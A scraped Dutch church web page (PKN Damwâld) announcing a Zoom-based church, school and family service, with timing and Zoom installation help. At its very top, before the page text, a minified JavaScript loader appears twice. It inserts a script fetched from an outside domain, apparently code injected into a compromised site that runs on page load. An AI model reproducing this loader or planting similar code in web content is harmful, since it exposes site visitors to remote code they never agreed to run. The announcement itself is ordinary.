;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); zoom - PKN Damwâld
zoomDoe live mee met de Kerk school en gezinsdienst!

Op zondag 31 januari organiseren wij de kerk school en gezinsdienst. Door alle maatregelen kunnen we helaas niet met z’n alleen aanwezig zijn in de kerk 🙁 Maar er toch bij te zijn nodigen wij jou uit om mee te doen via Zoom! Zoom is een programma om te videobellen via Internet en werkt om elke computer, tablet of smartphone! Via de onderstaande link kun je “joinen” in de Meeting en kun je gezellig meedoen tijdens de dient 🙂 Doe jij je webcam aan? Dan kun je helemaal actief meedoen!

 

Zoom meeting

Via de onderstaande knop kom je binnen in de Zoom meeting die we a.s. zondag gebruiken. Je bent welkom vanaf 9:15 uur, de dienst begint om 9:30 uur! Kom een beetje op tijd, doe je webcam aan en geniet, we maken er een feestje van!

Heb je de zoom app nog niet geïnstalleerd? Dan zal je gevraagd worden om Zoom te installeren, dit is heel eenvoudig. Op de computer krijg je de website waar je Zoom kunt downloaden en op je smartphone of tablet kun je Zoom downloaden uit de Apple AppStore of Google PlayStore!

Kom binnen!
Probleem?Neem contact op!

Als je een probleem hebt kun je een berichtje sturen naar Henry Wiersma